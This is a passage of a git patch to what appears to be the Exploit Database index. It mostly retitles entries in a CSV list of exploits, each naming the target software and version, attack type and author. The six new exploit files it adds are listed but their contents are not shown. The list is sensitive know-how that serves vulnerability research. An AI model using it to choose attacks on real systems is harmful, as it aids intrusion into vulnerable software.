From 2aa9d941dede658cab93655aa69192c9e19be4da Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 8 Sep 2016 05:08:29 +0000 Subject: [PATCH] DB: 2016-09-08 6 new exploits Too many to list! --- files.csv | 3634 ++++++++++++++------------- platforms/linux/remote/15449.pl | 2 + platforms/multiple/webapps/40346.py | 572 +++++ platforms/php/remote/40344.rb | 89 + platforms/php/webapps/40343.txt | 156 ++ platforms/php/webapps/40345.txt | 122 + platforms/windows/local/40341.txt | 242 ++ platforms/windows/local/40342.py | 74 + 8 files changed, 3077 insertions(+), 1814 deletions(-) create mode 100755 platforms/multiple/webapps/40346.py create mode 100755 platforms/php/remote/40344.rb create mode 100755 platforms/php/webapps/40343.txt create mode 100755 platforms/php/webapps/40345.txt create mode 100755 platforms/windows/local/40341.txt create mode 100755 platforms/windows/local/40342.py diff --git a/files.csv b/files.csv index 4801aa015..4c75ea246 100755 --- a/files.csv +++ b/files.csv @@ -13,7 +13,7 @@ id,file,description,date,author,platform,type,port 11,platforms/linux/dos/11.c,"Apache 2.0.44 (Linux) - Remote Denial of Service",2003-04-11,"Daniel Nystram",linux,dos,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 13,platforms/windows/dos/13.c,"Chindi Server 1.0 - Denial of Service",2003-04-18,"Luca Ercoli",windows,dos,0 -15,platforms/osx/local/15.c,"Apple Mac OS X 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0 +15,platforms/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0 16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Root Exploit",2003-04-18,einstein,linux,remote,1723 17,platforms/windows/dos/17.pl,"Xeneo Web Server 2.2.9.0 - Denial of Service",2003-04-22,"Tom Ferris",windows,dos,0 18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Root Exploit",2003-04-23,truff,linux,remote,0 @@ -28,7 +28,7 @@ id,file,description,date,author,platform,type,port 27,platforms/linux/remote/27.pl,"CommuniGate Pro Webmail 4.0.6 - Session Hijacking Exploit",2003-05-05,"Yaroslav Polyakov",linux,remote,80 28,platforms/windows/remote/28.c,"Kerio Personal Firewall 2.1.4 - Remote Code Execution",2003-05-08,Burebista,windows,remote,0 29,platforms/bsd/local/29.c,"Firebird 1.0.2 FreeBSD 4.7-RELEASE - Privilege Escalation",2003-05-12,bob,bsd,local,0 -30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution Exploit",2003-05-12,anonymous,windows,remote,0 +30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution",2003-05-12,anonymous,windows,remote,0 31,platforms/linux/local/31.pl,"CdRecord 2.0 - Mandrake Privilege Escalation",2003-05-14,anonymous,linux,local,0 32,platforms/windows/local/32.c,"Microsoft Windows XP - 'explorer.exe' Buffer Overflow",2003-05-21,einstein,windows,local,0 33,platforms/linux/remote/33.c,"WsMp3d 0.x - Remote Root Heap Overflow",2003-05-22,Xpl017Elz,linux,remote,8000 @@ -39,10 +39,10 @@ id,file,description,date,author,platform,type,port 38,platforms/linux/remote/38.pl,"Apache 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69 40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 /usr/mail - Local Exploit",2003-06-10,anonymous,linux,local,0 -41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution Exploit",2003-06-10,pokleyzz,linux,remote,80 -42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String Exploit",2003-06-11,ThreaT,windows,remote,25 +41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,linux,remote,80 +42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String",2003-06-11,ThreaT,windows,remote,25 43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9RC1 - (mod_sql) SQL Injection",2003-06-19,Spaine,linux,remote,21 -44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure Exploit",2003-06-20,"Rick Patel",php,webapps,0 +44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Exploit",2003-06-23,Rave,windows,remote,80 46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow",2003-06-27,B-r00t,linux,remote,25 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -87,7 +87,7 @@ id,file,description,date,author,platform,type,port 86,platforms/multiple/remote/86.c,"Real Server 7/8/9 (Windows / Linux) - Remote Root Exploit",2003-08-25,"Johnny Cyberpunk",multiple,remote,554 88,platforms/linux/remote/88.c,"GtkFtpd 1.0.4 - Remote Root Buffer Overflow",2003-08-28,vade79,linux,remote,21 89,platforms/linux/remote/89.c,"Linux pam_lib_smb < 1.1.6 - /bin/login Remote Exploit",2003-08-29,vertex,linux,remote,23 -90,platforms/windows/remote/90.c,"eMule/xMule/LMule - OP_SERVERMESSAGE Format String Exploit",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 +90,platforms/windows/remote/90.c,"eMule/xMule/LMule - OP_SERVERMESSAGE Format String",2003-09-01,"Rémi Denis-Courmont",windows,remote,4661 91,platforms/linux/local/91.c,"Stunnel 3.24/4.00 - Daemon Hijacking (PoC)",2003-09-05,"Steve Grubb",linux,local,0 92,platforms/windows/remote/92.c,"Microsoft WordPerfect Document Converter - Exploit (MS03-036)",2003-09-06,valgasu,windows,remote,0 93,platforms/linux/local/93.c,"RealPlayer 9 *nix - Privilege Escalation",2003-09-09,"Jon Hart",linux,local,0 @@ -127,7 +127,7 @@ id,file,description,date,author,platform,type,port 129,platforms/linux/local/129.asm,"Linux Kernel 2.4.22 - 'do_brk()' Privilege Escalation (PoC) (1)",2003-12-02,"Christophe Devine",linux,local,0 130,platforms/windows/remote/130.c,"Microsoft Windows XP - Workstation Service Remote Exploit (MS03-049)",2003-12-04,fiNis,windows,remote,0 131,platforms/linux/local/131.c,"Linux Kernel 2.4.22 - 'do_brk()' Privilege Escalation (2)",2003-12-05,"Wojciech Purczynski",linux,local,0 -132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 - mod_userdir Remote Users Disclosure Exploit",2003-12-06,m00,linux,remote,80 +132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 - mod_userdir Remote Users Disclosure",2003-12-06,m00,linux,remote,80 133,platforms/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow / Denial of Service",2003-12-15,"Peter Winter-Smith",windows,remote,80 134,platforms/hp-ux/local/134.c,"HP-UX B11.11 - /usr/bin/ct Local Format String Privilege Escalation",2003-12-16,watercloud,hp-ux,local,0 135,platforms/windows/remote/135.c,"Microsoft Windows Messenger Service - Remote Exploit FR (MS03-043)",2003-12-16,MrNice,windows,remote,135 @@ -188,7 +188,7 @@ id,file,description,date,author,platform,type,port 192,platforms/windows/remote/192.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (8)",2000-11-18,"Roelof Temmingh",windows,remote,80 193,platforms/linux/local/193.sh,"dump 0.4b15 - Privilege Escalation",2000-11-19,mat,linux,local,0 195,platforms/hp-ux/dos/195.sh,"HP-UX 11.00/10.20 - crontab Overwrite Files Exploit",2000-11-19,dubhe,hp-ux,dos,0 -197,platforms/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 - locale Format String Exploit",2000-11-20,"Solar Eclipse",solaris,local,0 +197,platforms/solaris/local/197.c,"Solaris/SPARC 2.7 / 7 - locale Format String",2000-11-20,"Solar Eclipse",solaris,local,0 199,platforms/hp-ux/local/199.c,"HP-UX 11.0 - pppd Stack Buffer Overflow",2000-11-20,K2,hp-ux,local,0 200,platforms/bsd/local/200.c,"BSDi SUIDPerl - Local Stack Buffer Overflow",2000-11-21,vade79,bsd,local,0 201,platforms/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Root Exploit",2000-11-21,venglin,multiple,remote,21 @@ -215,7 +215,7 @@ id,file,description,date,author,platform,type,port 222,platforms/linux/local/222.c,"gnome_segv - Local Buffer Overflow",2000-12-06,"Cody Tubbs",linux,local,0 225,platforms/linux/remote/225.c,"BFTPd 1.0.12 - Remote Exploit",2000-12-11,korty,linux,remote,21 226,platforms/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Root Exploit",2000-12-11,sk8,linux,remote,515 -227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - lpd Remote Root Format String Exploit",2000-12-11,DiGiT,linux,remote,515 +227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - lpd Remote Root Format String",2000-12-11,DiGiT,linux,remote,515 228,platforms/bsd/remote/228.c,"Oops! 1.4.6 - (one russi4n proxy-server) Heap Buffer Overflow",2000-12-15,diman,bsd,remote,3128 229,platforms/linux/local/229.c,"Red Hat 6.2 xsoldier-0.96 - Exploit",2000-12-15,zorgon,linux,local,0 230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Root Exploit",2000-12-15,VeNoMouS,linux,remote,515 @@ -230,7 +230,7 @@ id,file,description,date,author,platform,type,port 239,platforms/solaris/remote/239.c,"WU-FTPD 2.6.0 - Remote Format Strings Exploit",2001-01-03,kalou,solaris,remote,21 240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 - Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0 241,platforms/linux/dos/241.c,"ProFTPd 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21 -242,platforms/cgi/webapps/242.pl,"Fastgraf's whois.cgi - Remote Command Execution Exploit",2001-01-12,"Marco van Berkum",cgi,webapps,0 +242,platforms/cgi/webapps/242.pl,"Fastgraf's whois.cgi - Remote Command Execution",2001-01-12,"Marco van Berkum",cgi,webapps,0 243,platforms/bsd/local/243.c,"BSD chpass - (pw_error(3)) Privilege Escalation",2001-01-12,caddis,bsd,local,0 244,platforms/linux/dos/244.java,"ProFTPd 1.2.0pre10 - Remote Denial of Service",2001-01-12,JeT-Li,linux,dos,21 245,platforms/hp-ux/local/245.c,"HP-UX 11.0 - /bin/cu Privilege Escalation",2001-01-13,zorgon,hp-ux,local,0 @@ -288,11 +288,11 @@ id,file,description,date,author,platform,type,port 303,platforms/linux/remote/303.pl,"Borland Interbase 7.x - Remote Exploit",2004-06-25,"Aviram Jenik",linux,remote,3050 304,platforms/linux/remote/304.c,"Subversion 1.0.2 - svn_time_from_cstring() Remote Exploit",2004-06-25,"Gyan Chawdhary",linux,remote,3690 306,platforms/linux/dos/306.c,"Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local Denial of Service",2004-06-25,lorenzo,linux,dos,0 -307,platforms/linux/remote/307.py,"rlpr 2.04 - msg() Remote Format String Exploit",2004-06-25,jaguar,linux,remote,7290 +307,platforms/linux/remote/307.py,"rlpr 2.04 - msg() Remote Format String",2004-06-25,jaguar,linux,remote,7290 308,platforms/linux/remote/308.c,"MPlayer 1.0pre4 GUI - Filename handling Overflow",2004-07-04,c0ntex,linux,remote,0 309,platforms/php/webapps/309.c,"phpMyAdmin 2.5.7 - Remote code Injection",2004-07-04,"Nasir Simbolon",php,webapps,0 310,platforms/windows/remote/310.txt,"Microsoft Internet Explorer - Remote Application.Shell Exploit",2004-07-09,Jelmer,windows,remote,0 -311,platforms/multiple/remote/311.pl,"MySQL 4.1/5.0 - Zero-Length Password Authentication Bypass Exploit",2004-07-10,"Eli Kara",multiple,remote,3306 +311,platforms/multiple/remote/311.pl,"MySQL 4.1/5.0 - Zero-Length Password Authentication Bypass",2004-07-10,"Eli Kara",multiple,remote,3306 312,platforms/windows/dos/312.txt,"Norton AntiVirus - Denial of Service",2004-07-12,"Bipin Gautam",windows,dos,0 313,platforms/windows/remote/313.txt,"Microsoft Outlook Express - Window Opener",2004-07-13,anonymous,windows,remote,0 315,platforms/windows/remote/315.txt,"Microsoft Outlook Express - JavaScript Execution",2004-07-13,anonymous,windows,remote,0 @@ -305,7 +305,7 @@ id,file,description,date,author,platform,type,port 324,platforms/windows/dos/324.txt,"Ping of Death - Remote Denial of Service",1996-10-21,anonymous,windows,dos,0 325,platforms/linux/local/325.c,"BSD & Linux lpr - Privilege Escalation",1996-10-25,"Vadim Kolontsov",linux,local,0 328,platforms/solaris/local/328.c,"Solaris 2.4 - /bin/fdformat Local Buffer Overflows",1997-03-23,"Cristian Schipor",solaris,local,0 -329,platforms/windows/dos/329.txt,"Microsoft Windows NT - Crash with an Extra Long Username Denial of Service",1997-04-01,Fyodor,windows,dos,0 +329,platforms/windows/dos/329.txt,"Microsoft Windows NT - Crash with an Extra Long 'Username' Denial of Service",1997-04-01,Fyodor,windows,dos,0 330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp and lpsched - Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0 331,platforms/linux/local/331.c,"LibXt - XtAppInitialize() Overflow *xterm Exploit",1997-05-14,"Ming Zhang",linux,local,0 332,platforms/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps & chkey - Data Buffer Exploit",1997-05-19,"Joe Zbiciak",solaris,local,0 @@ -341,15 +341,15 @@ id,file,description,date,author,platform,type,port 364,platforms/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorization Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901 365,platforms/windows/dos/365.html,"Microsoft Internet Explorer - Denial of Service (11 bytes)",2004-07-23,Phuong,windows,dos,0 366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service",2004-07-24,MacDefender,windows,dos,0 -367,platforms/osx/local/367.txt,"Apple Mac OS X - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,osx,local,0 +367,platforms/osx/local/367.txt,"Apple Mac OSX - Panther Internet Connect Privilege Escalation",2004-07-28,B-r00t,osx,local,0 368,platforms/windows/local/368.c,"Microsoft Windows XP - Task Scheduler '.job' Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0 369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow",2004-08-01,"Serkan Akpolat",linux,local,0 370,platforms/linux/dos/370.c,"Citadel/UX - Remote Denial of Service (PoC)",2004-08-02,CoKi,linux,dos,0 371,platforms/linux/dos/371.c,"Apache HTTPd - Arbitrary Long HTTP Headers Denial of Service (C)",2004-08-02,anonymous,linux,dos,0 372,platforms/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21 -373,platforms/linux/remote/373.c,"OpenFTPd 0.30.1 - (message system) Remote Shell Exploit",2004-08-04,infamous41md,linux,remote,21 +373,platforms/linux/remote/373.c,"OpenFTPd 0.30.1 - (message system) Remote Shell",2004-08-04,infamous41md,linux,remote,21 374,platforms/linux/local/374.c,"SoX - '.wav' Local Buffer Overflow",2004-08-04,Rave,linux,local,0 -375,platforms/linux/local/375.c,"Linux Kernel 2.4.26 - File Offset Pointer Handling Memory Disclosure Exploit",2004-08-04,"Paul Starzetz",linux,local,0 +375,platforms/linux/local/375.c,"Linux Kernel 2.4.26 - File Offset Pointer Handling Memory Disclosure",2004-08-04,"Paul Starzetz",linux,local,0 376,platforms/windows/dos/376.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Null Pointer Crash",2004-08-04,anonymous,windows,dos,0 378,platforms/windows/remote/378.pl,"BlackJumboDog - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",windows,remote,21 379,platforms/linux/remote/379.txt,"CVSTrac - Arbitrary Code Execution",2004-08-06,anonymous,linux,remote,0 @@ -361,10 +361,10 @@ id,file,description,date,author,platform,type,port 385,platforms/windows/dos/385.c,"Microsoft Messenger (Linux) - Denial of Service (MS03-043)",2004-08-08,VeNoMouS,windows,dos,0 386,platforms/linux/remote/386.c,"xine 0.99.2 - Remote Stack Overflow",2004-08-09,c0ntex,linux,remote,80 387,platforms/linux/remote/387.c,"Dropbear SSH 0.34 - Remote Root Exploit",2004-08-09,livenn,linux,remote,22 -388,platforms/windows/local/388.c,"Ollydbg 1.10 - Format String Bug",2004-08-10,"Ahmet Cihan",windows,local,0 +388,platforms/windows/local/388.c,"Ollydbg 1.10 - Format String",2004-08-10,"Ahmet Cihan",windows,local,0 389,platforms/linux/remote/389.c,"LibPNG Graphics Library - Remote Buffer Overflow",2004-08-11,infamous41md,linux,remote,0 390,platforms/linux/remote/390.c,"GV PostScript Viewer - Remote Buffer Overflow (1)",2004-08-13,infamous41md,linux,remote,0 -391,platforms/osx/remote/391.pl,"Apple Mac OS X 10.3.3 - AppleFileServer Remote Root Overflow",2004-08-13,"Dino Dai Zovi",osx,remote,548 +391,platforms/osx/remote/391.pl,"Apple Mac OSX 10.3.3 - AppleFileServer Remote Root Overflow",2004-08-13,"Dino Dai Zovi",osx,remote,548 392,platforms/linux/remote/392.c,"Remote CVS 1.11.15 - (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401 393,platforms/linux/local/393.c,"LibPNG 1.2.5 - png_jmpbuf() Local Buffer Overflow",2004-08-13,anonymous,linux,local,0 394,platforms/linux/local/394.c,"ProFTPd - (ftpdctl) Local pr_ctrls_connect",2004-08-13,pi3,linux,local,0 @@ -400,7 +400,7 @@ id,file,description,date,author,platform,type,port 429,platforms/windows/dos/429.c,"Ground Control 1.0.0.7 - (Server/Client) Denial of Service",2004-08-31,"Luigi Auriemma",windows,dos,0 430,platforms/php/webapps/430.txt,"TorrentTrader 1.0 RC2 - SQL Injection",2004-09-01,aCiDBiTS,php,webapps,0 431,platforms/windows/remote/431.c,"AOL Instant Messenger AIM - 'Away' Message Remote Exploit (2)",2004-09-02,"John Bissell",windows,remote,0 -432,platforms/bsd/remote/432.c,"Courier-IMAP 3.0.2-r1 - auth_debug() Remote Format String Exploit",2004-09-02,ktha,bsd,remote,143 +432,platforms/bsd/remote/432.c,"Courier-IMAP 3.0.2-r1 - auth_debug() Remote Format String",2004-09-02,ktha,bsd,remote,143 433,platforms/multiple/dos/433.c,"Call of Duty 1.4 - Denial of Service",2004-09-05,"Luigi Auriemma",multiple,dos,0 434,platforms/linux/local/434.sh,"CDRDAO - Privilege Escalation",2004-09-07,"Karol Wiêsek",linux,local,0 435,platforms/windows/remote/435.c,"Trillian 0.74i - Remote Buffer Overflow (MSN Module Bug)",2004-09-08,Komrade,windows,remote,0 @@ -455,7 +455,7 @@ id,file,description,date,author,platform,type,port 588,platforms/windows/remote/588.py,"Ability Server 2.34 - FTP STOR Buffer Overflow",2004-10-21,muts,windows,remote,21 589,platforms/windows/remote/589.html,"Multiple (Almost all) Browsers - Tabbed Browsing Vulnerabilities",2004-10-22,"Jakob Balle",windows,remote,0 590,platforms/windows/remote/590.c,"ShixxNote 6.net - Remote Buffer Overflow",2004-10-22,class101,windows,remote,2000 -591,platforms/linux/local/591.c,"socat 1.4.0.2 - Local Format String Exploit (not setuid)",2004-10-23,CoKi,linux,local,0 +591,platforms/linux/local/591.c,"socat 1.4.0.2 - Local Format String (not setuid)",2004-10-23,CoKi,linux,local,0 592,platforms/windows/remote/592.py,"Ability Server 2.34 - (APPE) Remote Buffer Overflow",2004-10-23,KaGra,windows,remote,21 593,platforms/windows/dos/593.pl,"Quick 'n EasY 2.4 FTP Server - Remote Denial of Service",2004-10-24,KaGra,windows,dos,0 594,platforms/windows/dos/594.pl,"BaSoMail Server 1.24 - POP3/SMTP Remote Denial of Service",2004-10-24,KaGra,windows,dos,0 @@ -467,7 +467,7 @@ id,file,description,date,author,platform,type,port 603,platforms/windows/dos/603.c,"Master of Orion III 1.2.5 - Denial of Service",2004-10-27,"Luigi Auriemma",windows,dos,0 604,platforms/windows/dos/604.c,"Age of Sail II 1.04.151 - Remote Buffer Overflow",2004-03-03,"Luigi Auriemma",windows,dos,0 605,platforms/windows/dos/605.c,"Alpha Black Zero 1.04 - Remote Denial of Service",2004-03-03,"Luigi Auriemma",windows,dos,0 -606,platforms/windows/dos/606.c,"Chatman 1.5.1 RC1 - Broadcast Crash Exploit",2004-03-01,"Luigi Auriemma",windows,dos,0 +606,platforms/windows/dos/606.c,"Chatman 1.5.1 RC1 - Broadcast Crash",2004-03-01,"Luigi Auriemma",windows,dos,0 607,platforms/windows/dos/607.c,"Flash Messaging 5.2.0g - Remote Denial of Service",2004-03-02,"Luigi Auriemma",windows,dos,0 608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Remote Root Heap Overflow",2004-10-28,infamous41md,linux,remote,69 609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution (PoC)",2004-10-28,infamous41md,linux,remote,0 @@ -476,7 +476,7 @@ id,file,description,date,author,platform,type,port 616,platforms/windows/remote/616.c,"MiniShare 1.4.1 - Remote Buffer Overflow (1)",2004-11-07,class101,windows,remote,80 618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21 619,platforms/windows/remote/619.c,"CCProxy Log - Remote Stack Overflow",2004-11-09,Ruder,windows,remote,808 -620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String Exploit",2004-11-09,"Carlos Barros",linux,remote,25 +620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String",2004-11-09,"Carlos Barros",linux,remote,25 621,platforms/windows/remote/621.c,"CCProxy 6.2 - (ping) Remote Buffer Overflow",2004-11-10,KaGra,windows,remote,23 623,platforms/windows/remote/623.c,"SlimFTPd 3.15 - Remote Buffer Overflow",2004-11-10,class101,windows,remote,21 624,platforms/linux/local/624.c,"Linux Kernel 2.4.27 / 2.6.8 - 'binfmt_elf' Executable File Read Exploit",2004-11-10,"Paul Starzetz",linux,local,0 @@ -494,14 +494,14 @@ id,file,description,date,author,platform,type,port 638,platforms/windows/remote/638.py,"SLMail 5.5 - POP3 PASS Buffer Overflow",2004-11-18,muts,windows,remote,110 640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0 641,platforms/windows/remote/641.txt,"Microsoft Internet Explorer 6.0 SP2 - File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0 -642,platforms/cgi/webapps/642.pl,"TWiki 20030201 - search.pm Remote Command Execution Exploit",2004-11-20,RoMaNSoFt,cgi,webapps,0 +642,platforms/cgi/webapps/642.pl,"TWiki 20030201 - search.pm Remote Command Execution",2004-11-20,RoMaNSoFt,cgi,webapps,0 644,platforms/windows/remote/644.pl,"DMS POP3 Server 1.5.3 build 37 - Buffer Overflow",2004-11-21,"Reed Arvin",windows,remote,110 -645,platforms/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution Exploit",2004-11-21,spabam,php,webapps,0 -647,platforms/php/webapps/647.pl,"phpBB 2.0.10 - Remote Command Execution Exploit",2004-11-22,RusH,php,webapps,0 +645,platforms/php/webapps/645.pl,"GFHost PHP GMail - Remote Command Execution",2004-11-21,spabam,php,webapps,0 +647,platforms/php/webapps/647.pl,"phpBB 2.0.10 - Remote Command Execution",2004-11-22,RusH,php,webapps,0 648,platforms/php/webapps/648.pl,"Invision Power Board 2.0.0 < 2.0.2 - SQL Injection",2004-11-22,RusH,php,webapps,0 -649,platforms/windows/dos/649.c,"wodFtpDLX Client - ActiveX Control Buffer Overflow Crash Exploit",2004-11-22,Komrade,windows,dos,0 -650,platforms/windows/remote/650.c,"CoffeeCup FTP Clients (Direct 6.2.0.62) (Free 3.0.0.10) - Buffer Overflow Exploit",2004-11-22,Komrade,windows,remote,0 -651,platforms/windows/dos/651.c,"Halo 1.05 - Broadcast Client Crash Exploit",2004-11-22,"Luigi Auriemma",windows,dos,0 +649,platforms/windows/dos/649.c,"wodFtpDLX Client - ActiveX Control Buffer Overflow Crash",2004-11-22,Komrade,windows,dos,0 +650,platforms/windows/remote/650.c,"CoffeeCup FTP Clients (Direct 6.2.0.62) (Free 3.0.0.10) - Buffer Overflow",2004-11-22,Komrade,windows,remote,0 +651,platforms/windows/dos/651.c,"Halo 1.05 - Broadcast Client Crash",2004-11-22,"Luigi Auriemma",windows,dos,0 652,platforms/linux/remote/652.c,"Prozilla 1.3.6 - Remote Stack Overflow",2004-11-23,"Serkan Akpolat",linux,remote,8080 653,platforms/windows/dos/653.c,"Soldier of Fortune II 1.3 Server/Client - Denial of Service",2004-11-23,"Luigi Auriemma",windows,dos,0 654,platforms/windows/remote/654.c,"Winamp 5.06 - IN_CDDA.dll Remote Buffer Overflow",2004-11-24,k-otik,windows,remote,0 @@ -520,13 +520,13 @@ id,file,description,date,author,platform,type,port 670,platforms/windows/remote/670.c,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (C) (2)",2004-12-01,JohnH,windows,remote,143 671,platforms/windows/dos/671.c,"Neverwinter Nights special - Fake Players Denial of Service",2004-12-01,"Luigi Auriemma",windows,dos,0 672,platforms/windows/dos/672.c,"Kreed 1.05 - Format String / Denial of Service",2004-12-02,"Luigi Auriemma",windows,dos,0 -673,platforms/php/webapps/673.cgi,"phpBB 2.0.10 - Remote Command Execution Exploit (CGI)",2004-12-03,ZzagorR,php,webapps,0 +673,platforms/php/webapps/673.cgi,"phpBB 2.0.10 - Remote Command Execution (CGI)",2004-12-03,ZzagorR,php,webapps,0 675,platforms/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote,0 676,platforms/php/webapps/676.c,"phpBB 1.0.0 / 2.0.10 - admin_cash.php Remote Exploit",2004-12-05,evilrabbi,php,webapps,0 677,platforms/windows/dos/677.txt,"GetRight 5.2a - Skin File (.grs) Buffer Overflow",2004-12-06,ATmaCA,windows,dos,0 679,platforms/windows/dos/679.c,"Battlefield 1942 1.6.19 + Vietnam 1.2 - Broadcast Client Crash",2004-12-07,"Luigi Auriemma",windows,dos,0 -680,platforms/osx/local/680.txt,"Apple Mac OS X Adobe Version Cue - Privilege Escalation (Bash)",2004-12-08,"Jonathan Bringhurst",osx,local,0 -681,platforms/linux/remote/681.c,"Citadel/UX 6.27 - Remote Root Format String Exploit",2004-12-12,CoKi,linux,remote,504 +680,platforms/osx/local/680.txt,"Apple Mac OSX Adobe Version Cue - Privilege Escalation (Bash)",2004-12-08,"Jonathan Bringhurst",osx,local,0 +681,platforms/linux/remote/681.c,"Citadel/UX 6.27 - Remote Root Format String",2004-12-12,CoKi,linux,remote,504 682,platforms/windows/dos/682.c,"Codename Eagle 1.42 - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos,0 683,platforms/windows/dos/683.c,"Lithtech Engine (new protocol) - Socket Unreacheable Denial of Service",2004-12-13,"Luigi Auriemma",windows,dos,0 684,platforms/linux/local/684.c,"TipxD 1.1.1 - Local Format String (not setuid)",2004-12-14,CoKi,linux,local,0 @@ -534,7 +534,7 @@ id,file,description,date,author,platform,type,port 686,platforms/linux/dos/686.c,"Linux Kernel 2.6.9 / 2.4.22-28 - 'igmp.c' Local Denial of Service",2004-12-14,"Paul Starzetz",linux,dos,0 687,platforms/windows/dos/687.c,"OpenText FirstClass 8.0 - HTTP Daemon /Search Remote Denial of Service",2004-12-15,dila,windows,dos,0 688,platforms/hardware/dos/688.c,"Ricoh Aficio 450/455 PCL 5e Printer - ICMP Denial of Service",2004-12-15,x90c,hardware,dos,0 -689,platforms/multiple/remote/689.pl,"wget 1.9 - Directory Traversal Exploit",2004-12-15,jjminar,multiple,remote,0 +689,platforms/multiple/remote/689.pl,"wget 1.9 - Directory Traversal",2004-12-15,jjminar,multiple,remote,0 690,platforms/linux/dos/690.c,"Linux Kernel 2.4.28 / 2.6.9 - vc_resize int Local Overflow",2004-12-16,"Georgi Guninski",linux,dos,0 691,platforms/linux/dos/691.c,"Linux Kernel 2.4.28 / 2.6.9 - Memory Leak Local Denial of Service",2004-12-16,"Georgi Guninski",linux,dos,0 692,platforms/linux/dos/692.c,"Linux Kernel 2.4.28 / 2.6.9 - 'ip_options_get' Local Overflow",2004-12-16,"Georgi Guninski",linux,dos,0 @@ -549,7 +549,7 @@ id,file,description,date,author,platform,type,port 702,platforms/php/webapps/702.pl,"phpBB - highlight Arbitrary File Upload (Santy.A)",2004-12-22,anonymous,php,webapps,0 703,platforms/php/webapps/703.pl,"phpMyChat 0.14.5 - Remote Improper File Permissions Exploit",2004-12-22,sysbug,php,webapps,0 704,platforms/php/webapps/704.pl,"e107 - include() Remote Exploit",2004-12-22,sysbug,php,webapps,80 -705,platforms/multiple/remote/705.pl,"Webmin - Brute Force / Command Execution Exploit",2004-12-22,Di42lo,multiple,remote,10000 +705,platforms/multiple/remote/705.pl,"Webmin - Brute Force / Command Execution",2004-12-22,Di42lo,multiple,remote,10000 711,platforms/windows/remote/711.c,"CrystalFTP Pro 2.8 - Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,21 712,platforms/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Exploit",2004-12-23,pucik,linux,remote,8000 713,platforms/solaris/local/713.c,"Solaris 7/8/9 CDE LibDTHelp - 